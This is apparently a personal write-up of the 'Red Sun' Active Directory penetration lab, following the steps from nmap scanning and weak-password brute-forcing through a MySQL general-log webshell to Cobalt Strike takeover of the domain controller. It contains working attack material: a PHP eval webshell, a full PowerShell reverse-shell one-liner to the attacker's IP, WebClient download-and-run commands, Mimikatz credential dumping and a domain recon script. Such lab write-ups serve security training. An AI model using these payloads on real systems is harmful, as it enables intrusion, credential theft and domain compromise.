
Red Sun Target Range (I) Notes

Views: 383 / 2024-09-08 15:43:03


Summary

A domain-penetration target range for practising domain techniques. The main thing is getting comfortable with PowerShell syntax: PowerShell is far more capable than cmd, and many open-source offensive tools are written in it (Nishang, PowerView and so on). This is a beginner-level domain target range. I ran into some problems with it.

Target range address: /vuln/detail/2/

Default password for Red Sun Target: hongrisec@2019

My lab layout:

  • web: 192.168.81.239
  • win7: 192.168.52.141
  • domain controller: 192.168.52.138

The Kali attacker is 192.168.81.37.

I. nmap scanning

1) Host discovery

sudo nmap -sn 192.168.81.0/24
Nmap scan report for 192.168.81.239
Host is up (0.00047s latency).
MAC Address: 00:0C:29:EC:F8:D6 (VMware)

The target's IP is 192.168.81.239.

2) Port scanning

sudo nmap -sT --min-rate 10000 -p- -o ports 192.168.81.239
# Nmap 7.93 scan initiated Wed Sep  4 05:56:09 2024 as: nmap -sT --min-rate 10000 -p- -o ports 192.168.81.239
Warning: 192.168.81.239 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.81.239
Host is up (0.00079s latency).
Not shown: 61205 closed tcp ports (conn-refused), 4319 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1027/tcp open  IIS
1028/tcp open  unknown
1029/tcp open  ms-lsa
1230/tcp open  periscope
3306/tcp open  mysql
MAC Address: 00:0C:29:EC:F8:D6 (VMware)

# Nmap done at Wed Sep  4 05:56:21 2024 -- 1 IP address (1 host up) scanned in 12.44 seconds

Extract the open ports from the saved output

cat ports | grep open | awk -F '/' '{print $1}' | paste -sd ','

and store them in a variable

ports=$(cat ports | grep open | awk -F '/' '{print $1}' | paste -sd ',')

3) Detailed information scanning

Here $ports is the variable set above; pressing Tab expands it to its value so you can check the port list before running.

sudo nmap -sT -sV -sC -O -p$ports 192.168.81.239 -o details
# Nmap 7.93 scan initiated Wed Sep  4 06:01:26 2024 as: nmap -sT -sC -sV -O -p80,135,139,445,1025,1026,1027,1028,1029,1230,3306 -o details 192.168.81.239
Nmap scan report for 192.168.81.239
Host is up (0.00097s latency).

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
|_http-title: phpStudy \xE6\x8E\xA2\xE9\x92\x88 2014 
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: GOD)
1025/tcp open  msrpc        Microsoft Windows RPC
1026/tcp open  msrpc        Microsoft Windows RPC
1027/tcp open  msrpc        Microsoft Windows RPC
1028/tcp open  msrpc        Microsoft Windows RPC
1029/tcp open  msrpc        Microsoft Windows RPC
1230/tcp open  msrpc        Microsoft Windows RPC
3306/tcp open  mysql        MySQL (unauthorized)
MAC Address: 00:0C:29:EC:F8:D6 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: Host: STU1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: STU1, NetBIOS user: <unknown>, NetBIOS MAC: 000c29ecf8d6 (VMware)
|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   210: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-09-04T10:02:28
|_  start_date: 2024-09-04T09:46:14
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: stu1
|   NetBIOS computer name: STU1\x00
|   Domain name: 
|   Forest name: 
|   FQDN: 
|_  System time: 2024-09-04T18:02:28+08:00

OS and Service detection performed. Please report any incorrect results at /submit/ .
# Nmap done at Wed Sep  4 06:02:39 2024 -- 1 IP address (1 host up) scanned in 73.24 seconds

II. Web Penetration

Open the web page

image-20240904190151295

It is a phpStudy PHP probe page. Scroll down

and there is a button that tests the MySQL connection

image-20240904190355871

Enter arbitrary credentials with Burp intercepting

and capture the request

image-20240904190503862
sudo vi pass_req

Paste the raw HTTP request in:

POST / HTTP/1.1
Host: 192.168.81.239
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 89
Origin: http://192.168.81.239
Connection: close
Referer: http://192.168.81.239/
Upgrade-Insecure-Requests: 1

host=localhost&port=3306&login=FUZZ1&password=FUZZ2&act=MySQL%E6%A3%80%E6%B5%8B&funName=

Replace the parameters to brute-force with FUZZ keywords: login=FUZZ1&password=FUZZ2

1) Password brute-forcing

Here I use ffuf: -request feeds it the saved request, -mode selects the attack mode (clusterbomb tries every username against every password), and the two -w wordlists are conventional weak-password lists for usernames and passwords. -fs 14807 filters out responses of the failure size, so only a different-sized (successful) response is reported.

Of course Burp Intruder works just as well; it is up to you.

sudo ffuf --request pass_req -u http://192.168.81.239 -w /usr/share/SecLists/Usernames/:FUZZ1 -w /usr/share/SecLists/Passwords/2023-200_most_used_passwords.txt:FUZZ2 -fs 14807 -mode clusterbomb

Results:


        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : POST
 :: URL              : http://192.168.81.239
 :: Wordlist         : FUZZ1: /usr/share/SecLists/Usernames/
 :: Wordlist         : FUZZ2: /usr/share/SecLists/Passwords/2023-200_most_used_passwords.txt
 :: Header           : Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
 :: Header           : Accept-Language: en-US,en;q=0.5
 :: Header           : Content-Type: application/x-www-form-urlencoded
 :: Header           : Origin: http://192.168.81.239
 :: Header           : Connection: close
 :: Header           : Referer: http://192.168.81.239/
 :: Header           : Host: 192.168.81.239
 :: Header           : User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
 :: Header           : Accept-Encoding: gzip, deflate
 :: Header           : Upgrade-Insecure-Requests: 1
 :: Data             : host=localhost&port=3306&login=FUZZ1&password=FUZZ2&act=MySQL%E6%A3%80%E6%B5%8B&funName=
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 14807
________________________________________________

[Status: 200, Size: 14804, Words: 1464, Lines: 401, Duration: 2136ms]
    * FUZZ1: root
    * FUZZ2: root

:: Progress: [3400/3400] :: Job [1/1] :: 19 req/sec :: Duration: [0:02:59] :: Errors: 0 ::

A weak password exists: root:root

Save the credentials to a file:

echo 'root:root' > creds

2) Directory brute-forcing

We have database credentials, and this is a phpStudy site, so let's brute-force directories to look for a backend page.

sudo gobuster dir -u http://192.168.81.239 -w /usr/share/wordlists/dirbuster/directory-list-2.

Here we use gobuster; many tools do directory brute-forcing (feroxbuster, ffuf, dirb, dirsearch, wfuzz and so on). They differ in wordlists and request handling, so when one tool gets nowhere, try another; it may well find what you want.

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.81.239
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/%20                  (Status: 403) [Size: 210]
/*checkout*           (Status: 403) [Size: 219]
/phpmyadmin           (Status: 301) [Size: 241] [--> http://192.168.81.239/phpmyadmin/]
/*docroot*            (Status: 403) [Size: 218]
/*                    (Status: 403) [Size: 210]
/con                  (Status: 403) [Size: 212]
/http%3A              (Status: 403) [Size: 214]
/**http%3a            (Status: 403) [Size: 216]
/*http%3A             (Status: 403) [Size: 215]
/aux                  (Status: 403) [Size: 212]
/**http%3A            (Status: 403) [Size: 216]
/%C0                  (Status: 403) [Size: 210]
/%3FRID%3D2671        (Status: 403) [Size: 218]
/devinmoore*          (Status: 403) [Size: 220]
/200109*              (Status: 403) [Size: 216]
/*sa_                 (Status: 403) [Size: 213]
/*dc_                 (Status: 403) [Size: 213]
/%D8                  (Status: 403) [Size: 210]
/%CE                  (Status: 403) [Size: 210]
/%CF                  (Status: 403) [Size: 210]
/%CD                  (Status: 403) [Size: 210]
/%CB                  (Status: 403) [Size: 210]
/%CC                  (Status: 403) [Size: 210]
/%D1                  (Status: 403) [Size: 210]
/%CA                  (Status: 403) [Size: 210]
/%D0                  (Status: 403) [Size: 210]
/%D3                  (Status: 403) [Size: 210]
/%D6                  (Status: 403) [Size: 210]
/%D7                  (Status: 403) [Size: 210]
/%D5                  (Status: 403) [Size: 210]
/%D4                  (Status: 403) [Size: 210]
/%D2                  (Status: 403) [Size: 210]
/%C9                  (Status: 403) [Size: 210]
/%C1                  (Status: 403) [Size: 210]
/%C8                  (Status: 403) [Size: 210]
/%C2                  (Status: 403) [Size: 210]
/%C5                  (Status: 403) [Size: 210]
/%C6                  (Status: 403) [Size: 210]
/%C7                  (Status: 403) [Size: 210]
/%C3                  (Status: 403) [Size: 210]
/%C4                  (Status: 403) [Size: 210]
/%D9                  (Status: 403) [Size: 210]
/%DE                  (Status: 403) [Size: 210]
/%DF                  (Status: 403) [Size: 210]
/%DD                  (Status: 403) [Size: 210]
/%DB                  (Status: 403) [Size: 210]
/phpMyAdmin           (Status: 301) [Size: 241] [--> http://192.168.81.239/phpMyAdmin/]
/login%3f             (Status: 403) [Size: 215]
/%22james%20kim%22    (Status: 403) [Size: 230]
/%22julie%20roehm%22  (Status: 403) [Size: 232]
/%22britney%20spears%22 (Status: 403) [Size: 235]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

There is a phpMyAdmin page; let's visit it

image-20240904192705361

Enter the credentials brute-forced earlier, root:root, and we are logged into the database backend.

image-20240904193038489

III. Gaining a foothold

Ways to get a shell from phpMyAdmin:

  1. Write a webshell straight into the web directory with select ... into outfile (needs file-write permission)
  2. Write a webshell via the log file

For the first method, execute

SHOW VARIABLES LIKE '%secure%'

which shows

image-20240904194641946

secure_file_priv set to NULL disables file import and export entirely. If the value is a directory name, files can only be written inside that directory (an empty string means no restriction). It is a read-only variable and can only be changed in the configuration file, so the first method is out.

The second method uses the log files

SHOW VARIABLES LIKE 'general%'
image-20240904195113907

general_log: the switch for the general query log; it can be set with an SQL statement

general_log_file: the absolute path of the log file

With logging on, every SQL statement we send is written to that file, so a statement containing PHP code, logged into a .php file under the web root, becomes a webshell.

 set global general_log=on;# Enable logging

 set global general_log_file='C:/phpStudy/WWW/';# Point the log file at a .php file under the web directory

The absolute path of the web root was shown by the PHP probe page at the start; turn global logging on

image-20240904200423585

Execute

select '<?php @eval($_GET["code"]);?>'

then visit the log file in the browser. Everything else logged to that file is just text around the PHP tag, so the page still executes; switch general_log back off afterwards so the file does not keep growing with every query.

image-20240904200224427

Reverse shell

In real engagements, connecting directly with tools such as China Chopper or AntSword is not recommended either, because their traffic signatures are obvious and a moment's carelessness will trip network monitoring. Godzilla encrypts its traffic, but its webshell format, protocol and behaviour are fairly fixed; if you want to use it, modify it yourself to get past some of the detection gear.

a) A failed attempt

On the Kali side, share nc over SMB with impacket's smbserver and start a listener.

The following command uses Python to expose the current directory as an SMB share named share

python /usr/share/doc/python3-impacket/examples/smbserver.py share .

Listen on a port

nc -lvp 8888

image-20240904211825105

Command injection through the webshell, running nc straight from the share (the nc executable name and the shell passed to -e were dropped from this line):

http://192.168.81.239/?code=system('\\\\192.168.81.37\\share\\ -e  192.168.81.37 8888');

Here SMB shows a normal connection. I waited ages for the shell to come back, which was a bit annoying, so I cheated and looked on the Win7 box itself and found that

image-20240904212431033

The Win7 on this target machine is not compatible with nc; I tried both the 64-bit and 32-bit builds and neither works. Still, the idea is worth passing on, so the SMB-share approach sticks in your mind!

b) Direct command injection

Google: php reverse shell windows powershell

Reference: /from-php-s-hell-to-powershell-heaven-da40ce840da8

Use rlwrap for a more interactive listener

sudo rlwrap nc -lvp 8888

The PowerShell one-liner that connects back

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.81.37',8888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Base64 encoding

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

Because of the special characters in the command, typing it directly or URL-encoding it did not produce a shell, so I base64-encoded it and decode it with PHP's base64_decode(), avoiding any interference from the special characters.

Visit

http://192.168.81.239/?code=system(base64_decode("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")); 

The shell comes back successfully

image-20240905085444553

I got lucky: the shell came back as the SYSTEM user, so there is no need for privilege escalation.

Once in the shell, switch the console code page to UTF-8 first

chcp 65001

IV. Domain information collection

Network adapters
ipconfig /all
image-20240905091531456
image-20240905091609880

The adapter on the 192.168.52.0 segment should be the intranet side facing the domain; the hostname and the domain information are shown here as well

System information
systeminfo
image-20240905091928827

The Domain field shows a domain name, which means this machine is domain-joined.

On an ordinary stand-alone machine this field reads WORKGROUP.

The installed hotfixes and the network adapter information are shown as well

Routing table
route print
image-20240905091322341
Other hosts
net view
image-20240905092230684
Domain administrators
image-20240905092951993
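The commands above are read off screenshots one at a time. As an added example (my code, not from the original post), here is the same information gathered by one function that runs on the target's PowerShell 2.0 and returns an object, so it can be pasted into the reverse shell and inspected in one go. It uses only WMI, the .NET 2.0 directory-services classes and net.exe; the 192.168.52. prefix is the lab value from the page, and the parsing of net group output is a heuristic explained in the comments.

```powershell
# Added example, not code from the original post: the recon steps above
# (ipconfig /all, the Domain line of systeminfo, net view/ping for the DC, net
# group for the domain admins) collected by one function that runs on PowerShell
# 2.0, so it can be pasted into the reverse shell on the Win7 host. Only WMI,
# the .NET 2.0 directory-services classes and net.exe are used. The 192.168.52.
# prefix is the lab value from the page; the target's real output is not assumed.

function Get-DomainRecon {
    param([string]$IntranetPrefix = '192.168.52.')

    $cs   = Get-WmiObject -Class Win32_ComputerSystem
    $info = New-Object PSObject -Property @{
        Hostname     = $cs.Name
        Domain       = $cs.Domain          # 'WORKGROUP' on a stand-alone box
        PartOfDomain = $cs.PartOfDomain
    }

    # IPv4 address per adapter, flagging the one on the intranet segment.
    $nics = @()
    foreach ($cfg in (Get-WmiObject -Class Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = True')) {
        foreach ($ip in $cfg.IPAddress) {
            if ($ip -like '*.*') {         # skip IPv6 entries
                $nics += New-Object PSObject -Property @{
                    Adapter  = $cfg.Description
                    IP       = $ip
                    Gateway  = ($cfg.DefaultIPGateway -join ',')
                    Intranet = $ip.StartsWith($IntranetPrefix)
                }
            }
        }
    }
    $info | Add-Member -MemberType NoteProperty -Name NICs -Value $nics

    if ($cs.PartOfDomain) {
        # Ask the domain for its controllers instead of guessing from net view
        # and ping; the PartOfDomain check avoids an exception off-domain.
        [void][System.Reflection.Assembly]::LoadWithPartialName('System.DirectoryServices')
        try {
            $dom = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
            $dcs = @($dom.DomainControllers | ForEach-Object {
                New-Object PSObject -Property @{ Name = $_.Name; IP = $_.IPAddress }
            })
        } catch {
            $dcs = @("error: $($_.Exception.Message)")
        }
        $info | Add-Member -MemberType NoteProperty -Name DomainControllers -Value $dcs

        # Domain Admins parsed from net.exe output: names start after the dashed
        # separator and stop at the "command completed" line, which (English or
        # Chinese) ends with a full stop; a sAMAccountName cannot end with one.
        $admins = @()
        $inList = $false
        $raw = & net group 'Domain Admins' /domain 2>&1 | Out-String
        foreach ($line in ($raw -split "`r?`n")) {
            if ($line -match '^-{5,}') { $inList = $true; continue }
            if (-not $inList -or $line.Trim() -eq '') { continue }
            if ($line -match '[.。]\s*$') { break }
            $admins += @($line -split '\s+' | Where-Object { $_ -ne '' })
        }
        $info | Add-Member -MemberType NoteProperty -Name DomainAdmins -Value $admins
    }
    return $info
}

# Usage inside the shell:
#   $r = Get-DomainRecon; $r | Format-List; $r.NICs | Format-Table -AutoSize
```

DomainControllers comes straight from the domain object, so the DC's name and IP are obtained without the net view / ping detour; net group is still used for the admins because the plain one-liner has no module dependency and matches what the screenshot shows.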

V. Domain penetration

From the information gathered, the domain controller host is owa, and the domain name is the one shown in the systeminfo output above.

Resolve the domain controller's IP

ping owa
image-20240905094056717

The domain controller's IP is 192.168.52.138

Grabbing passwords with mimikatz

1) Upload Invoke-Mimikatz.ps1

Invoke-Mimikatz.ps1 link: /PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1

Start an HTTP server on Kali

php -S 0:80

Check the target's PowerShell version

$PSVersionTable

because the commands differ slightly before and after PowerShell 3.0

image-20240905102653425

The target runs PowerShell 2.0, and the Invoke-WebRequest cmdlet was only introduced in PowerShell 3.0.

So we use the .NET WebClient class to download instead

powershell -command "& {(New-Object System.Net.WebClient).DownloadFile('http://192.168.81.37/Invoke-Mimikatz.ps1','c:\program files\Invoke-Mimikatz.ps1')}"
image-20240905140642822

The HTTP server log shows the request

The file was written to the c:\program files directory

cd c:\'program files'
dir
image-20240905140800334

Uploaded successfully.

Of course, mimikatz also needs AV evasion; otherwise running it will trigger the antivirus.

2) Run mimikatz

To run Invoke-Mimikatz.ps1 in PowerShell we first have to relax the execution policy

Get-ExecutionPolicy

Restricted: no scripts may run.

AllSigned: only scripts signed by a trusted publisher may run.

RemoteSigned: locally created scripts may run; scripts downloaded from the Internet must be signed (a file fetched with WebClient carries no Zone.Identifier mark, so RemoteSigned treats it as local).

Unrestricted: all scripts may run, with a warning for scripts downloaded from the Internet.

Setting it to RemoteSigned is enough

Set-ExecutionPolicy RemoteSigned -Scope CurrentUser

image-20240905142321237

Alternatively, pass -ExecutionPolicy Bypass to a single powershell invocation

Import

Import-Module .\Invoke-Mimikatz.ps1

or dot-source it (note the leading dot and space; running .\Invoke-Mimikatz.ps1 on its own executes it in a child scope and leaves no functions behind)

. .\Invoke-Mimikatz.ps1

Execute

Invoke-Mimikatz -Command "privilege::debug sekurlsa::logonpasswords"

No output comes back.

In theory it should dump the passwords fine; I have hit quite a few problems with this target.

Attempts to solve the problem (failed)

I wonder whether PowerShell is just unstable when launched from PHP.

Would the reverse shell be more stable using Nishang's TCP script? Let's try Nishang

sudo apt install nishang

Running the nishang command lands in its directory

nishang
cd Shells

where there is the Invoke-PowerShellTcp.ps1 file

sudo vi Invoke-PowerShellTcp.ps1

At the bottom of the file append the call that triggers the reverse shell

Invoke-PowerShellTcp -Reverse -IPAddress 192.168.81.37 -Port 4444
image-20240905183220791

so that as soon as the script is loaded into memory it connects back.

On Kali, start the listener and the HTTP server

nc -lvp 4444

php -S 0:80

In the existing shell, execute

powershell -command "& {(new-object System.Net.WebClient).downloadfile('http://192.168.81.37/Invoke-PowerShellTcp.ps1','c:\Invoke-PowerShellTcp.ps1')}" ; c:\Invoke-PowerShellTcp.ps1
image-20240905191100176

The download succeeds and the reverse shell arrives, but it is the same kind of shell as before and still cannot run Invoke-Mimikatz.ps1

3) Change of approach (using Cobalt Strike)

Start CS

./teamserver localhost 123456
./cobaltstrike

Generate the payload and upload it

powershell -ExecutionPolicy Bypass -command "& {(New-Object System.Net.WebClient).DownloadFile('http://192.168.81.37/', 'C:\Users\Public\')}"

image-20240908140727778

Run it

 /c ".\" 

image-20240908141454607

The beacon checks in successfully

image-20240908141543698

Port scan

image-20240908141817252

image-20240908141906193

Results

image-20240908142258719

image-20240908142321629

Run mimikatz

image-20240908142720247

image-20240908142808061

mimikatz shows the password of the domain administrator for the DC, owa: hongrisec@2022

VI. Taking the domain controller

With the domain administrator's password, taking the DC is easy.

Create an SMB listener in CS

image-20240908143836586

Jump straight to it

image-20240908143908306

The domain controller checks in.

image-20240908144157561

The DC is ours; the whole domain follows.

Jump to host 141.

image-20240908144330710

image-20240908144527049

All three machines are compromised

image-20240908145009742

Summary

  1. The nmap scan shows the web server with ports 80, 135, 139, 445, 3306 and several RPC ports open; directory brute-forcing on port 80 plus weak-password fuzzing found the phpMyAdmin backend and got us logged in.
  2. Using the database's general log, a one-line webshell was written and a PowerShell reverse shell obtained. Inside that PowerShell 2.0 shell Invoke-Mimikatz produced no output during domain information gathering; my attempts to fix this failed.
  3. Finally Cobalt Strike was used to move laterally to the domain controller and gain domain admin privileges.